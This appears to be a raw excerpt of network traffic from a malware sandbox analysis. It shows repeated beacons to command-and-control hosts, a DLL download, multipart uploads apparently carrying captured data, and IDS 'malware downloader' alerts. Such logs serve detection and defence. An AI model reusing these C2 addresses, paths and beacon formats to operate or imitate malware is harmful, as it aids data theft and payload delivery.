Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /ProlongedPortable.dll HTTP/1.1Host: 185.215.113.19Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTIwMDU=Host: 185.215.113.19Content-Length: 92157Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTIwMjg=Host: 185.215.113.19Content-Length: 92180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTE1OTM=Host: 185.215.113.19Content-Length: 91745Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzNjM=Host: 185.215.113.19Content-Length: 85515Cache-Control: no-cache

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 52.212.52.84:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 185.215.113.26:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49723 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49730 -> 52.212.52.84:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49726 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49740 -> 52.212.52.84:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 52.212.52.84:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49751 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49754 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49762 -> 52.212.52.84:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49766 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49778 -> 103.130.147.211:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49798 -> 176.9.8.206:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: millyscroqwp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=6Rwdb5aJ4Jny30AgQFUhhnp2TBdEK.zSVnR_xS0merM-1725376444-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: locatedblsoqp.shop
